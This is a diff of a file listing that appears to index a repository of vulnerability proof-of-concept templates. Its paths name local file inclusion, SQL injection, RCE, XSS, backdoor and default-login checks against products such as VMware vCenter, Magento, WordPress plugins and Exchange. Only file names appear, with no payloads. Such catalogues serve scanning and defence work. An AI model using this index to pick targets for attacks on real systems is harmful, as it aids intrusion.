-48715,13 +48730,11 @@ ./poc/local_file_inclusion/mpsec-lfi-8956.yaml ./poc/local_file_inclusion/mpsec-lfi-8957.yaml ./poc/local_file_inclusion/mthemeunus-lfi-8970.yaml -./poc/local_file_inclusion/mthemeunus-lfi-8971.yaml ./poc/local_file_inclusion/mthemeunus-lfi.yaml ./poc/local_file_inclusion/nuxt-js-semi-lfi.yaml ./poc/local_file_inclusion/oliver-library-lfi-9239.yaml ./poc/local_file_inclusion/oliver-library-lfi-9240.yaml ./poc/local_file_inclusion/oliver-library-lfi-9241.yaml -./poc/local_file_inclusion/oliver-library-lfi.yaml ./poc/local_file_inclusion/omnia-mpx-lfi.yaml ./poc/local_file_inclusion/opencti-lfi-9267.yaml ./poc/local_file_inclusion/opencti-lfi-9268.yaml @@ -48729,16 +48742,15 @@ ./poc/local_file_inclusion/opensis-lfi-2.yaml ./poc/local_file_inclusion/opensis-lfi-9315.yaml ./poc/local_file_inclusion/opensis-lfi-9317.yaml +./poc/local_file_inclusion/opensis-lfi.yaml ./poc/local_file_inclusion/oracle-ebs-lfi.yaml ./poc/local_file_inclusion/oracle-fatwire-lfi-9378.yaml ./poc/local_file_inclusion/oracle-fatwire-lfi-9379.yaml ./poc/local_file_inclusion/oracle-fatwire-lfi-9380.yaml -./poc/local_file_inclusion/orbiteam-bscw-server-lfi-9404.yaml ./poc/local_file_inclusion/orbiteam-bscw-server-lfi.yaml ./poc/local_file_inclusion/orbiteam-bscw-server-unauthenticated-lfi.yaml ./poc/local_file_inclusion/ov3-online-administration-unauthenticated-lfi.yaml ./poc/local_file_inclusion/pacsone-server-6-6-2-lfi.yaml -./poc/local_file_inclusion/pacsone-server-lfi-9428.yaml ./poc/local_file_inclusion/pacsone-server-lfi-9429.yaml ./poc/local_file_inclusion/pacsone-server-lfi-9430.yaml ./poc/local_file_inclusion/phpwiki-lfi-9564.yaml @@ -48746,7 +48758,6 @@ ./poc/local_file_inclusion/phpwiki-lfi-9566.yaml ./poc/local_file_inclusion/phpwiki-lfi-9567.yaml ./poc/local_file_inclusion/phpwiki-lfi-9568.yaml -./poc/local_file_inclusion/phpwiki-lfi.yaml ./poc/local_file_inclusion/process-maker-lfi.yaml ./poc/local_file_inclusion/processmaker-lfi-9659.yaml ./poc/local_file_inclusion/processmaker-lfi-9660.yaml @@ -48756,7 +48767,7 @@ ./poc/local_file_inclusion/qihang-media-lfi-9766.yaml ./poc/local_file_inclusion/qihang-media-lfi-9767.yaml ./poc/local_file_inclusion/qihang-media-lfi-9768.yaml -./poc/local_file_inclusion/qihang-media-lfi-9769.yaml +./poc/local_file_inclusion/qihang-media-lfi.yaml ./poc/local_file_inclusion/ruijie-networks-lfi-9938.yaml ./poc/local_file_inclusion/ruijie-networks-lfi-9939.yaml ./poc/local_file_inclusion/ruijie-networks-lfi-9940.yaml @@ -48776,8 +48787,8 @@ ./poc/local_file_inclusion/shortcode-lfi-10214.yaml ./poc/local_file_inclusion/shortcode-lfi-10215.yaml ./poc/local_file_inclusion/shortcode-lfi-10216.yaml +./poc/local_file_inclusion/shortcode-lfi.yaml ./poc/local_file_inclusion/simple-image-manipulator-lfi-10281.yaml -./poc/local_file_inclusion/simple-image-manipulator-lfi-10282.yaml ./poc/local_file_inclusion/simple-image-manipulator-lfi-10283.yaml ./poc/local_file_inclusion/simple-image-manipulator-lfi.yaml ./poc/local_file_inclusion/sitecore-lfi.yaml @@ -48787,6 +48798,7 @@ ./poc/local_file_inclusion/sl-studio-lfi-10321.yaml ./poc/local_file_inclusion/sniplets-lfi-10341.yaml ./poc/local_file_inclusion/sniplets-lfi-10342.yaml +./poc/local_file_inclusion/sniplets-lfi-10343.yaml ./poc/local_file_inclusion/sniplets-lfi.yaml ./poc/local_file_inclusion/sofneta-mecdream-pacs-lfi-10350.yaml ./poc/local_file_inclusion/sofneta-mecdream-pacs-lfi-10351.yaml @@ -48795,6 +48807,7 @@ ./poc/local_file_inclusion/squirrelmail-lfi-10517.yaml ./poc/local_file_inclusion/squirrelmail-lfi-10518.yaml ./poc/local_file_inclusion/surrealtodo-lfi-10580.yaml +./poc/local_file_inclusion/surrealtodo-lfi.yaml ./poc/local_file_inclusion/targa-camera-lfi-10652.yaml ./poc/local_file_inclusion/targa-camera-lfi-10653.yaml ./poc/local_file_inclusion/targa-camera-lfi-10655.yaml @@ -48804,7 +48817,9 @@ ./poc/local_file_inclusion/thinkcmf-lfi-10721.yaml ./poc/local_file_inclusion/thinkcmf-lfi-10722.yaml ./poc/local_file_inclusion/thinkcmf-lfi-10723.yaml +./poc/local_file_inclusion/thinkcmf-lfi-10724.yaml ./poc/local_file_inclusion/thinkcmf-lfi-2.yaml +./poc/local_file_inclusion/thinkcmf-lfi.yaml ./poc/local_file_inclusion/thinkcmf-lfi.yml ./poc/local_file_inclusion/thinkcmflfi.yaml ./poc/local_file_inclusion/thinkphp6-lang-lfi.yaml @@ -48815,22 +48830,20 @@ ./poc/local_file_inclusion/vmware-vcenter-lfi-11047.yaml ./poc/local_file_inclusion/vmware-vcenter-lfi-2.yaml ./poc/local_file_inclusion/vmware-vcenter-lfi-3.yaml -./poc/local_file_inclusion/vmware-vcenter-lfi-linux-11042.yaml ./poc/local_file_inclusion/vmware-vcenter-lfi-linux-11043.yaml ./poc/local_file_inclusion/vmware-vcenter-lfi-linux-11044.yaml ./poc/local_file_inclusion/vmware-vcenter-lfi-linux-11045.yaml -./poc/local_file_inclusion/vmware-vcenter-lfi.yaml ./poc/local_file_inclusion/windows-lfi-fuzz.yaml ./poc/local_file_inclusion/wordpress-LFI.yaml ./poc/local_file_inclusion/wordpress-ext-adaptive-images-lfi.yaml ./poc/local_file_inclusion/wordpress-ext-adaptive-images-lfi.yml +./poc/local_file_inclusion/wordpress-lfi(1).yaml ./poc/local_file_inclusion/wordpress-lfi.yaml ./poc/local_file_inclusion/wordpress-wordfence-lfi-11346.yaml ./poc/local_file_inclusion/wordpress-wordfence-lfi-11347.yaml ./poc/local_file_inclusion/wordpress-wordfence-lfi-11348.yaml ./poc/local_file_inclusion/wordpress-wordfence-lfi-11349.yaml ./poc/local_file_inclusion/wordpress-wordfence-lfi-11350.yaml -./poc/local_file_inclusion/wordpress-wordfence-lfi-11351.yaml ./poc/local_file_inclusion/wordpress-wordfence-lfi-11352.yaml ./poc/local_file_inclusion/wp-brandfolder-plugin-lfi.yaml ./poc/local_file_inclusion/wp-church-admin-lfi.yaml @@ -48841,16 +48854,16 @@ ./poc/local_file_inclusion/wp-localize-post-lfi.yaml ./poc/local_file_inclusion/wp-mail-masta-lfi.yaml ./poc/local_file_inclusion/wp-memphis-documents-library-lfi-1.yaml +./poc/local_file_inclusion/wp-memphis-documents-library-lfi-11495.yaml ./poc/local_file_inclusion/wp-memphis-documents-library-lfi-11496.yaml ./poc/local_file_inclusion/wp-memphis-documents-library-lfi-11497.yaml -./poc/local_file_inclusion/wp-memphis-documents-library-lfi-11498.yaml ./poc/local_file_inclusion/wp-memphis-documents-library-lfi-11499.yaml ./poc/local_file_inclusion/wp-memphis-documents-library-lfi-2.yaml ./poc/local_file_inclusion/wp-oxygen-theme-lfi-11519.yaml ./poc/local_file_inclusion/wp-oxygen-theme-lfi-11520.yaml ./poc/local_file_inclusion/wp-oxygen-theme-lfi-11521.yaml ./poc/local_file_inclusion/wp-oxygen-theme-lfi-11522.yaml -./poc/local_file_inclusion/wp-oxygen-theme-lfi-11523.yaml +./poc/local_file_inclusion/wp-oxygen-theme-lfi.yaml ./poc/local_file_inclusion/wp-plugin-ad-widget-lfi.yaml ./poc/local_file_inclusion/wp-plugin-issuu-panel-lfi.yaml ./poc/local_file_inclusion/wp-plugin-memphis-documents-library-lfi.yaml @@ -48860,9 +48873,8 @@ ./poc/local_file_inclusion/wp-simple-fields-lfi-11568.yaml ./poc/local_file_inclusion/wp-simple-fields-lfi-11569.yaml ./poc/local_file_inclusion/wp-simple-fields-lfi-11570.yaml -./poc/local_file_inclusion/wp-simple-fields-lfi.yaml +./poc/local_file_inclusion/wp-simple-fields-lfi-11571.yaml ./poc/local_file_inclusion/wp-site-editor-lfi.yaml -./poc/local_file_inclusion/wp-socialfit-xss-11577.yaml ./poc/local_file_inclusion/wp-socialfit-xss-11579.yaml ./poc/local_file_inclusion/wp-socialfit-xss-11580.yaml ./poc/local_file_inclusion/wp-socialfit-xss-11581.yaml @@ -48878,19 +48890,21 @@ ./poc/local_file_inclusion/wp-tinymce-thumbnail-plugin-lfi.yaml ./poc/local_file_inclusion/wp-tutor-lfi-11596.yaml ./poc/local_file_inclusion/wp-tutor-lfi-11597.yaml +./poc/local_file_inclusion/wp-tutor-lfi-11598.yaml ./poc/local_file_inclusion/wp-tutor-lfi-11599.yaml -./poc/local_file_inclusion/wp-tutor-lfi-11600.yaml ./poc/local_file_inclusion/wp-tutor-lfi-11601.yaml +./poc/local_file_inclusion/wp-tutor-lfi.yaml ./poc/local_file_inclusion/wp-vault-lfi(1).yaml ./poc/local_file_inclusion/wp-vault-lfi-11606.yaml ./poc/local_file_inclusion/wp-vault-lfi-11607.yaml ./poc/local_file_inclusion/wp-vault-lfi-11608.yaml ./poc/local_file_inclusion/wp-vault-lfi-11609.yaml ./poc/local_file_inclusion/wp-vault-lfi-11610.yaml +./poc/local_file_inclusion/wp-vault-lfi-11611.yaml ./poc/local_file_inclusion/wp-vault-lfi-11612.yaml ./poc/local_file_inclusion/wp-wechat-broadcast-lfi.yaml ./poc/local_file_inclusion/xerox-efi-lfi-11681.yaml -./poc/local_file_inclusion/xerox-efi-lfi-11683.yaml +./poc/local_file_inclusion/xerox-efi-lfi-11682.yaml ./poc/local_file_inclusion/xerox-efi-lfi.yaml ./poc/local_file_inclusion/xmlrpcservlet_lfi.yaml ./poc/local_file_inclusion/xxe_lfi.yaml @@ -48898,7 +48912,6 @@ ./poc/local_file_inclusion/yisaitong-uploadfilemanager-lfi.yaml ./poc/local_file_inclusion/yishaadmin-lfi-11743.yaml ./poc/local_file_inclusion/yishaadmin-lfi-11744.yaml -./poc/local_file_inclusion/yishaadmin-lfi.yaml ./poc/local_file_inclusion/yonyou-nc-printbill-lfi.yaml ./poc/local_file_inclusion/zendrop-dropshipping-and-fulfillment-2fe6949ea942d8a3b7779bc5ccf17f38.yaml ./poc/local_file_inclusion/zendrop-dropshipping-and-fulfillment-d55b65118444e2b38ff7422e4f9db780.yaml @@ -48912,6 +48925,7 @@ ./poc/magento/magento-2-exposed-api-8687.yaml ./poc/magento/magento-2-exposed-api-8688.yaml ./poc/magento/magento-2-exposed-api-8689.yaml +./poc/magento/magento-admin-panel-8690.yaml ./poc/magento/magento-admin-panel-8691.yaml ./poc/magento/magento-admin-panel-8692.yaml ./poc/magento/magento-admin-panel-8693.yaml @@ -48920,14 +48934,14 @@ ./poc/magento/magento-admin-panel.yaml ./poc/magento/magento-cacheleak-8696.yaml ./poc/magento/magento-cacheleak-8697.yaml +./poc/magento/magento-cacheleak-8698.yaml ./poc/magento/magento-cacheleak-8699.yaml -./poc/magento/magento-cacheleak.yaml ./poc/magento/magento-config-1.yaml ./poc/magento/magento-config-2.yaml ./poc/magento/magento-config-8700.yaml ./poc/magento/magento-config-8701.yaml +./poc/magento/magento-config-8702.yaml ./poc/magento/magento-config-8703.yaml -./poc/magento/magento-config-disclosure.yaml ./poc/magento/magento-config.yaml ./poc/magento/magento-detect-1.yaml ./poc/magento/magento-detect-2.yaml @@ -48939,7 +48953,6 @@ ./poc/magento/magento-installer.yaml ./poc/magento/magento-unprotected-dev-files-1.yaml ./poc/magento/magento-unprotected-dev-files-2.yaml -./poc/magento/magento-unprotected-dev-files-8708.yaml ./poc/magento/magento-unprotected-dev-files-8709.yaml ./poc/magento/magento-unprotected-dev-files.yaml ./poc/magento/magento-workflow.yaml @@ -48962,7 +48975,6 @@ ./poc/microsoft/74cms-show-sqli.yaml ./poc/microsoft/74cms-sqli-1.yaml ./poc/microsoft/74cms-sqli-1.yml -./poc/microsoft/74cms-sqli-10.yaml ./poc/microsoft/74cms-sqli-2.yaml ./poc/microsoft/74cms-sqli-2.yml ./poc/microsoft/74cms-sqli-8.yaml @@ -49083,16 +49095,17 @@ ./poc/microsoft/aikcms_v2-poster-editphp-time-blind.yaml ./poc/microsoft/aikcms_v2-xss.yaml ./poc/microsoft/aikcms_v2_notice_edit_sqli.yaml +./poc/microsoft/aims-password-mgmt-client-218.yaml +./poc/microsoft/aims-password-mgmt-client-219.yaml ./poc/microsoft/aims-password-mgmt-client-220.yaml -./poc/microsoft/aims-password-mgmt-client-221.yaml ./poc/microsoft/aims-password-mgmt-client.yaml -./poc/microsoft/aims-password-portal-222.yaml ./poc/microsoft/aims-password-portal-223.yaml ./poc/microsoft/aims-password-portal-224.yaml ./poc/microsoft/aims-password-portal.yaml ./poc/microsoft/alibaba-group-dms.yaml ./poc/microsoft/anecms.yaml ./poc/microsoft/api-buttercms-403.yaml +./poc/microsoft/api-buttercms.yaml ./poc/microsoft/appcms-databases.yaml ./poc/microsoft/appcms.yaml ./poc/microsoft/arforms-120f4065771d97da59109a537bd16756.yaml @@ -49144,10 +49157,11 @@ ./poc/microsoft/beescms_v3-login-sql-injection.yaml ./poc/microsoft/beescms_v4-Permission-bypass.yaml ./poc/microsoft/beescms_v4-login-sqli.yaml +./poc/microsoft/bems-api-lfi-707.yaml ./poc/microsoft/bems-api-lfi-708.yaml ./poc/microsoft/bems-api-lfi-709.yaml ./poc/microsoft/bems-api-lfi-710.yaml -./poc/microsoft/bems-api-lfi-711.yaml +./poc/microsoft/bems-api-lfi-712.yaml ./poc/microsoft/bentley-systems-projectwise.yaml ./poc/microsoft/bio-lims.yaml ./poc/microsoft/block-styler-for-gravity-forms-322a86f28cc5049106653fa64c408640.yaml @@ -49364,7 +49378,6 @@ ./poc/microsoft/couchcms-cve-2018-7662.yml ./poc/microsoft/craft-cms-detect-1246.yaml ./poc/microsoft/craft-cms-detect-1247.yaml -./poc/microsoft/craft-cms-detect-1248.yaml ./poc/microsoft/craftcms-admin-panel.yaml ./poc/microsoft/craftcms-seomatic-cve-2020-9757-rce.yml ./poc/microsoft/crhms-medical-insurance-decision-support-system.yaml @@ -49421,12 +49434,12 @@ ./poc/microsoft/dedecms-carbuyaction-fileinclude-6792.yaml ./poc/microsoft/dedecms-carbuyaction-fileinclude-6793.yaml ./poc/microsoft/dedecms-carbuyaction-fileinclude-6794.yaml +./poc/microsoft/dedecms-carbuyaction-fileinclude.yaml ./poc/microsoft/dedecms-carbuyaction-fileinclude.yml ./poc/microsoft/dedecms-cve-2018-6910.yml ./poc/microsoft/dedecms-cve-2018-7700-rce.yml ./poc/microsoft/dedecms-guestbook-sqli.yaml ./poc/microsoft/dedecms-guestbook-sqli.yml -./poc/microsoft/dedecms-membergroup-sqli-6796.yaml ./poc/microsoft/dedecms-membergroup-sqli-6797.yaml ./poc/microsoft/dedecms-membergroup-sqli-6798.yaml ./poc/microsoft/dedecms-membergroup-sqli-6799.yaml @@ -49443,7 +49456,6 @@ ./poc/microsoft/default-microsoft-azure-page-6874.yaml ./poc/microsoft/default-microsoft-azure-page-6875.yaml ./poc/microsoft/default-microsoft-azure-page-6876.yaml -./poc/microsoft/default-microsoft-azure-page.yaml ./poc/microsoft/devalcms-xss.yaml ./poc/microsoft/diancms.yaml ./poc/microsoft/dm-albums-45ba464412c6ae4b94e80349ccf8b660.yaml @@ -49458,8 +49470,8 @@ ./poc/microsoft/dnatools-dnalims.yaml ./poc/microsoft/doccms.yaml ./poc/microsoft/docebolms.yaml -./poc/microsoft/dotcms-admin-panel-7085.yaml ./poc/microsoft/dotcms-admin-panel-7086.yaml +./poc/microsoft/dotcms-admin-panel-7087.yaml ./poc/microsoft/dotcms-admin-panel.yaml ./poc/microsoft/dotcms-version-detect.yaml ./poc/microsoft/dotnetcms-sqli-7089.yaml @@ -49470,6 +49482,7 @@ ./poc/microsoft/drupal_module-config_terms-access-bypass.yaml ./poc/microsoft/drupal_module-forms_steps-access-bypass.yaml ./poc/microsoft/drupal_module-spamspan-cross-site-scripting.yaml +./poc/microsoft/duomicms-sql-injection-7122.yaml ./poc/microsoft/duomicms-sql-injection-7123.yaml ./poc/microsoft/duomicms-sql-injection-7124.yaml ./poc/microsoft/duomicms-sql-injection-7125.yaml @@ -49486,6 +49499,7 @@ ./poc/microsoft/dzs-zoomsounds-listing-7147.yaml ./poc/microsoft/dzs-zoomsounds-listing-7148.yaml ./poc/microsoft/dzs-zoomsounds-listing-7149.yaml +./poc/microsoft/dzs-zoomsounds-listing.yaml ./poc/microsoft/dzs-zoomsounds-plugin-d41d8cd98f00b204e9800998ecf8427e.yaml ./poc/microsoft/dzs-zoomsounds-plugin.yaml ./poc/microsoft/dzs-zoomsounds.yaml @@ -49502,9 +49516,8 @@ ./poc/microsoft/emails-blacklist-everest-forms-6477bf18cad6c823db485408d49b337b.yaml ./poc/microsoft/emails-blacklist-everest-forms-ee9870d5bef0545dced6af21473d9057.yaml ./poc/microsoft/emails-blacklist-everest-forms.yaml +./poc/microsoft/empirecms-xss-7218.yaml ./poc/microsoft/empirecms-xss-7219.yaml -./poc/microsoft/empirecms-xss-7220.yaml -./poc/microsoft/empirecms-xss.yaml ./poc/microsoft/ems-login-panel-7223.yaml ./poc/microsoft/ems-login-panel-7224.yaml ./poc/microsoft/ems-login-panel-7225.yaml @@ -49528,7 +49541,6 @@ ./poc/microsoft/feifeicms-lfr-7463.yaml ./poc/microsoft/feifeicms-lfr-7464.yaml ./poc/microsoft/feifeicms-lfr-7465.yaml -./poc/microsoft/feifeicms-lfr.yaml ./poc/microsoft/feifeicms-lfr.yml ./poc/microsoft/feifeicms-workflow.yaml ./poc/microsoft/feifeicms.yaml @@ -49591,8 +49603,7 @@ ./poc/microsoft/forticlientems-panel.yaml ./poc/microsoft/fscf-sms-6e9ad46ba7b82908596d92a906a7c328.yaml ./poc/microsoft/fscf-sms.yaml -./poc/microsoft/fuelcms-default-login-7572.yaml -./poc/microsoft/fuelcms-default-login.yaml +./poc/microsoft/fuelcms-default-login-7571.yaml ./poc/microsoft/fuelcms-panel.yaml ./poc/microsoft/funnelforms-free-1297d1fb57bd7d885d80a5e4a197f915.yaml ./poc/microsoft/funnelforms-free-1c97e6bc65d4aa64831d683b602c87bd.yaml @@ -49627,7 +49638,6 @@ ./poc/microsoft/getsimple-cms-detect-7614.yaml ./poc/microsoft/getsimple-cms-detect-7615.yaml ./poc/microsoft/getsimple-cms-detector-7611.yaml -./poc/microsoft/getsimple-cms-detector-7613.yaml ./poc/microsoft/getsimple-cms-detector.yaml ./poc/microsoft/getsimple-cms.yaml ./poc/microsoft/ghostcms.yaml @@ -49647,8 +49657,9 @@ ./poc/microsoft/goodlms.yaml ./poc/microsoft/grav-cms-detect-7841.yaml ./poc/microsoft/grav-cms-detect-7842.yaml +./poc/microsoft/grav-cms-detect-7843.yaml +./poc/microsoft/grav-cms-detect-7844.yaml ./poc/microsoft/grav-cms-detect-7845.yaml -./poc/microsoft/grav-cms-detect.yaml ./poc/microsoft/gravcms.yaml ./poc/microsoft/gravity-forms-dps-pxpay-dc6fdd47b30188fa018518ba346c5e82.yaml ./poc/microsoft/gravity-forms-dps-pxpay.yaml @@ -49794,14 +49805,14 @@ ./poc/microsoft/kevinlab-bems-sqli-8457.yaml ./poc/microsoft/kevinlab-bems-sqli-8458.yaml ./poc/microsoft/kevinlab-bems-sqli-8459.yaml -./poc/microsoft/kevinlab-bems-sqli.yaml +./poc/microsoft/kevinlab-bems-sqli-8460.yaml ./poc/microsoft/kevinlab-hems-backdoor-8463.yaml ./poc/microsoft/kevinlab-hems-backdoor-8464.yaml ./poc/microsoft/kevinlab-hems-backdoor-8465.yaml ./poc/microsoft/kevinlab-hems-backdoor-8466.yaml ./poc/microsoft/kevinlab-hems-backdoor-8467.yaml ./poc/microsoft/kiwitcms-json-rpc.yaml -./poc/microsoft/kiwitcms-login-8497.yaml +./poc/microsoft/kiwitcms-login-8496.yaml ./poc/microsoft/kiwitcms-login.yaml ./poc/microsoft/kordil-edms.yaml ./poc/microsoft/kpcms-socket-login-info-disclosure.yaml @@ -49836,7 +49847,7 @@ ./poc/microsoft/lotuscms-rce-2.yaml ./poc/microsoft/lotuscms-rce-8650.yaml ./poc/microsoft/lotuscms-rce-8651.yaml -./poc/microsoft/lotuscms-rce-8652.yaml +./poc/microsoft/lotuscms-rce-8653.yaml ./poc/microsoft/lws-sms-c00e7e76d8a521ccca85015413c6ff0e.yaml ./poc/microsoft/lws-sms-d41d8cd98f00b204e9800998ecf8427e.yaml ./poc/microsoft/lws-sms-e9c6a32be0e960060a7ab93a7bca535d.yaml @@ -49847,6 +49858,7 @@ ./poc/microsoft/maccms-rce.yml ./poc/microsoft/maccms.yaml ./poc/microsoft/maccmsv10-backdoo.yaml +./poc/microsoft/maccmsv10-backdoor-8683.yaml ./poc/microsoft/maccmsv10-backdoor-8684.yaml ./poc/microsoft/maccmsv10-backdoor-8685.yaml ./poc/microsoft/maccmsv10-backdoor-8686.yaml @@ -49907,6 +49919,7 @@ ./poc/microsoft/microsoft-exchange-panel-8850.yaml ./poc/microsoft/microsoft-exchange-panel.yaml ./poc/microsoft/microsoft-exchange-server-detect-8852.yaml +./poc/microsoft/microsoft-exchange-server-detect-8853.yaml ./poc/microsoft/microsoft-exchange-server-detect.yaml ./poc/microsoft/microsoft-exchange-workflow.yaml ./poc/microsoft/microsoft-exchange.yaml @@ -49919,8 +49932,9 @@ ./poc/microsoft/microsoft-silverlight.yaml ./poc/microsoft/microsoft-skype-for-business.yaml ./poc/microsoft/microsoft-teams-phish.yaml -./poc/microsoft/microsoft-teams-webhook-8856.yaml ./poc/microsoft/microsoft-teams-webhook-8857.yaml +./poc/microsoft/microsoft-teams-webhook-8858.yaml +./poc/microsoft/microsoft-teams-webhook.yaml ./poc/microsoft/mm-forms-community-9b22852627967262a0033b664f77f26c.yaml ./poc/microsoft/mm-forms-community.yaml ./poc/microsoft/modern-designs-for-gravity-forms-6477bf18cad6c823db485408d49b337b.yaml @@ -49929,8 +49943,9 @@ ./poc/microsoft/mollie-forms-1838f12ac89bd2b98d6ccc82e100a58a.yaml ./poc/microsoft/mollie-forms-f0db812e51ae6400a634ecab5f82571a.yaml ./poc/microsoft/mollie-forms.yaml -./poc/microsoft/ms-adcs-detect-8960.yaml +./poc/microsoft/ms-adcs-detect-8961.yaml ./poc/microsoft/ms-adcs-detect.yaml +./poc/microsoft/ms-exchange-server-reflected-xss-8962.yaml ./poc/microsoft/ms-exchange-server-reflected-xss-8963.yaml ./poc/microsoft/ms-exchange-server-reflected-xss-8964.yaml ./poc/microsoft/ms-exchange-server-reflected-xss-8965.yaml @@ -49999,14 +50014,15 @@ ./poc/microsoft/myucms-lfr-8984.yaml ./poc/microsoft/myucms-lfr-8985.yaml ./poc/microsoft/myucms-lfr-8986.yaml +./poc/microsoft/myucms-lfr-8987.yaml ./poc/microsoft/myucms-lfr.yml ./poc/microsoft/namaste-lms-119ec46f108a332aca6034c537083044.yaml ./poc/microsoft/namaste-lms-5a9d5217f7143833c2e6879ff9d010b1.yaml ./poc/microsoft/namaste-lms-9482e96ff87b6b144e3214e2145ccbb5.yaml ./poc/microsoft/namaste-lms-f3dd353da7150ac371daba104daa37d4.yaml ./poc/microsoft/namaste-lms.yaml -./poc/microsoft/netlify-cms-9039.yaml ./poc/microsoft/netlify-cms-9040.yaml +./poc/microsoft/netlify-cms-9041.yaml ./poc/microsoft/netlify-cms.yaml ./poc/microsoft/nex-forms-8ae2cf1fb5917fff39746f64c8df93f8.yaml ./poc/microsoft/nex-forms-express-wp-form-builder-03800489aeb5ec718d025ca048ebef5f.yaml @@ -50121,7 +50137,8 @@ ./poc/microsoft/nitc-cms.yaml ./poc/microsoft/normstar-hr.yaml ./poc/microsoft/nucleus-cms.yaml -./poc/microsoft/octobercms-default-login-9193.yaml +./poc/microsoft/octobercms-default-login-9192.yaml +./poc/microsoft/octobercms-default-login.yaml ./poc/microsoft/octobercms-detect-1.yaml ./poc/microsoft/octobercms-detect-2.yaml ./poc/microsoft/octobercms-detect-9194.yaml @@ -50129,7 +50146,6 @@ ./poc/microsoft/odoo-cms-redirect-9199.yaml ./poc/microsoft/odoo-cms-redirect-9200.yaml ./poc/microsoft/odoo-cms-redirect-9201.yaml -./poc/microsoft/odoo-cms-redirect.yaml ./poc/microsoft/official-mailerlite-sign-up-forms-2cfff66bdd973664a4a41739a9cfd162.yaml ./poc/microsoft/official-mailerlite-sign-up-forms-417d17c6d1f9885b1e28c61ded72670d.yaml ./poc/microsoft/official-mailerlite-sign-up-forms-521ff6cfe5c2370a3c60b11e8a14f9a2.yaml @@ -50161,7 +50177,6 @@ ./poc/microsoft/paraview-uams.yaml ./poc/microsoft/payment-forms-for-paystack-9e71ae11056f9c8a0f3c1bdcd525390c.yaml ./poc/microsoft/payment-forms-for-paystack.yaml -./poc/microsoft/pbootcms-database-file-download-9469.yaml ./poc/microsoft/pbootcms-database-file-download.yaml ./poc/microsoft/pbootcms-database-file-download.yml ./poc/microsoft/pbootcms-v3.1.2-rce.yaml @@ -50204,8 +50219,8 @@ ./poc/microsoft/power-cpms.yaml ./poc/microsoft/power-powerpms.yaml ./poc/microsoft/powercreator-cms-rce-9643.yaml +./poc/microsoft/powercreator-cms-rce-9644.yaml ./poc/microsoft/powercreator-cms-rce-9645.yaml -./poc/microsoft/powercreator-cms-rce-9646.yaml ./poc/microsoft/powercreator-cms-rce-9647.yaml ./poc/microsoft/powercreator-cms.yaml ./poc/microsoft/preamsolutions-inspection-and-modification-information-platform.yaml @@ -50223,14 +50238,13 @@ ./poc/microsoft/reflected-params.yaml ./poc/microsoft/rhymix-cms-detect-9876.yaml ./poc/microsoft/rhymix-cms-detect-9877.yaml -./poc/microsoft/rhymix-cms-detect-9878.yaml -./poc/microsoft/rhymix-cms-detect.yaml +./poc/microsoft/rhymix-cms-detect-9879.yaml ./poc/microsoft/rubygems-key.yaml ./poc/microsoft/ruoyi-cms-unauth.yaml ./poc/microsoft/s-cms.yaml -./poc/microsoft/saferoads-vms-login-9970.yaml ./poc/microsoft/saferoads-vms-login-9971.yaml ./poc/microsoft/saferoads-vms-login-9972.yaml +./poc/microsoft/saferoads-vms-login-9973.yaml ./poc/microsoft/saferoads-vms-login-9974.yaml ./poc/microsoft/saferoads-vms-login.yaml ./poc/microsoft/samsung-phish.yaml @@ -50254,8 +50268,8 @@ ./poc/microsoft/samsung-wlan-ap-rce-10006.yaml ./poc/microsoft/samsung-wlan-ap-rce-10007.yaml ./poc/microsoft/samsung-wlan-ap-rce-10008.yaml -./poc/microsoft/samsung-wlan-ap-rce-10009.yaml ./poc/microsoft/samsung-wlan-ap-rce-10010.yaml +./poc/microsoft/samsung-wlan-ap-rce.yaml ./poc/microsoft/samsung-wlan-ap-wea453e-rce.yaml ./poc/microsoft/samsung-wlan-ap-wea453e-rce.yml ./poc/microsoft/samsung-wlan-ap-workflow-10011.yaml @@ -50384,7 +50398,6 @@ ./poc/microsoft/strapi-cms-detect-10539.yaml ./poc/microsoft/strapi-cms-detect-10540.yaml ./poc/microsoft/strapi-cms-detect-10541.yaml -./poc/microsoft/strapi-cms-detect.yaml ./poc/microsoft/subrion-cms.yaml ./poc/microsoft/super-forms-2cd1c68a41b46de84ad3cc139fda4544.yaml ./poc/microsoft/super-forms-7a7fd172ce540ffe3161fe509dd3e76a.yaml @@ -50430,6 +50443,7 @@ ./poc/microsoft/tiki-wiki-cms.yaml ./poc/microsoft/tikiwiki-cms-1.yaml ./poc/microsoft/tikiwiki-cms-10773.yaml +./poc/microsoft/tikiwiki-cms-10774.yaml ./poc/microsoft/tikiwiki-cms-10775.yaml ./poc/microsoft/tikiwiki-cms-10776.yaml ./poc/microsoft/tikiwiki-cms-2.yaml @@ -50440,7 +50454,6 @@ ./poc/microsoft/top-xss-params-10806.yaml ./poc/microsoft/top-xss-params-10807.yaml ./poc/microsoft/top-xss-params-10808.yaml -./poc/microsoft/top-xss-params-10809.yaml ./poc/microsoft/top-xss-params.yaml ./poc/microsoft/topper-nms.yaml ./poc/microsoft/torro-forms-32b2e2ff95bce6c610720879796f4bca.yaml @@ -50465,7 +50478,6 @@ ./poc/microsoft/views-for-wpforms-lite.yaml ./poc/microsoft/vospari-forms-e9bd69dbdf78833ce2843fc07cba7b74.yaml ./poc/microsoft/vospari-forms.yaml -./poc/microsoft/vpms-auth-bypass-11066.yaml ./poc/microsoft/vpms-auth-bypass-11067.yaml ./poc/microsoft/vpms-auth-bypass-11068.yaml ./poc/microsoft/vpms-auth-bypass-11069.yaml @@ -50482,9 +50494,8 @@ ./poc/microsoft/weforms.yaml ./poc/microsoft/wems-enterprise-xss.yaml ./poc/microsoft/wems-manager-xss-11191.yaml -./poc/microsoft/wems-manager-xss-11192.yaml ./poc/microsoft/wems-manager-xss-11193.yaml -./poc/microsoft/wems-manager-xss.yaml +./poc/microsoft/wems-manager-xss-11194.yaml ./poc/microsoft/whfst-cms.yaml ./poc/microsoft/white-label-cms-1855568f250a52767f45b60ca73feade.yaml ./poc/microsoft/white-label-cms-21f790f886a508204a6d79b9c5155bc7.yaml @@ -50499,14 +50510,15 @@ ./poc/microsoft/white-label-cms-plugin.yaml ./poc/microsoft/white-label-cms.yaml ./poc/microsoft/wondercms-detect-11221.yaml -./poc/microsoft/wondercms-detect-11222.yaml +./poc/microsoft/wondercms-detect-11223.yaml +./poc/microsoft/wondercms-detect.yaml ./poc/microsoft/woocommerce-ninjaforms-product-addons-fe7479a6b6025e86397ca09e26459aa3.yaml ./poc/microsoft/woocommerce-ninjaforms-product-addons.yaml ./poc/microsoft/woosms-sms-module-for-woocommerce-15f567edca2252a2ec556aac3ef868ef.yaml 